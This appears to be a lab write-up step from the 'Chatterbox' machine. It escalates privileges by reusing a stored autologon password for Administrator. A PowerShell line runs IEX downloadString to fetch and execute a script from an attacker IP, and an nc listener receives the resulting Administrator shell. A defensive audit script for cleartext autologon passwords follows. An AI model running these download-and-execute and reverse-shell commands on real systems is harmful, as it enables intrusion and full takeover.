5 privesc autologon creds
PS> $password = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force
PS> $cred = New-Object System.Management.Automation.PSCredential('Administrator', $password)
PS> Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.WebClient).downloadString('http://10.10.16.161/shell2.ps1')" -Credential $cred
$ rlwrap nc -lvnp 8080
listening on [any] 8080 ...
connect to [10.10.16.161] from (UNKNOWN) [10.10.10.74] 49178
Windows PowerShell running as user Administrator on CHATTERBOX
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
whoami
chatterbox\administrator
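
An added defender-side check, not part of the original notes: the step above works because a password kept for automatic logon was also accepted for the Administrator account. The script below reports whether the Winlogon key holds a cleartext autologon password without printing it; the function name Test-AutoLogonExposure and the sample values are constructed for illustration.

```powershell
# Audit for cleartext autologon credentials (added example).
$WinlogonKey = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'

function Test-AutoLogonExposure {
    param(
        # Hashtable or object carrying the Winlogon value names
        # (AutoAdminLogon, DefaultUserName, DefaultDomainName, DefaultPassword).
        [Parameter(Mandatory)] $Values
    )

    $findings = @()

    if ($Values.AutoAdminLogon -eq '1') {
        $findings += 'AutoAdminLogon is enabled'
    }

    if (-not [string]::IsNullOrEmpty($Values.DefaultPassword)) {
        # Report presence and the affected account only; never echo the password.
        $account = "$($Values.DefaultDomainName)\$($Values.DefaultUserName)"
        $findings += "DefaultPassword is stored in cleartext for $account"
    }

    [pscustomobject]@{
        Exposed  = ($findings.Count -gt 0)
        Findings = $findings
    }
}

# Constructed sample values, so the check can be exercised on any machine.
$sample = @{
    AutoAdminLogon    = '1'
    DefaultDomainName = 'EXAMPLEHOST'
    DefaultUserName   = 'exampleuser'
    DefaultPassword   = 'constructed-sample-value'
}
Test-AutoLogonExposure -Values $sample | Format-List

# Live check on the local host (only runs where the registry key exists).
if (Test-Path $WinlogonKey) {
    $live = Get-ItemProperty -Path $WinlogonKey
    Test-AutoLogonExposure -Values $live | Format-List
}
```

If the live check reports a stored DefaultPassword, remove that value and give the autologon account a password that no other account shares, the local Administrator in particular. Where automatic logon is genuinely required, the Sysinternals Autologon tool keeps the password as an LSA secret instead of a cleartext registry value.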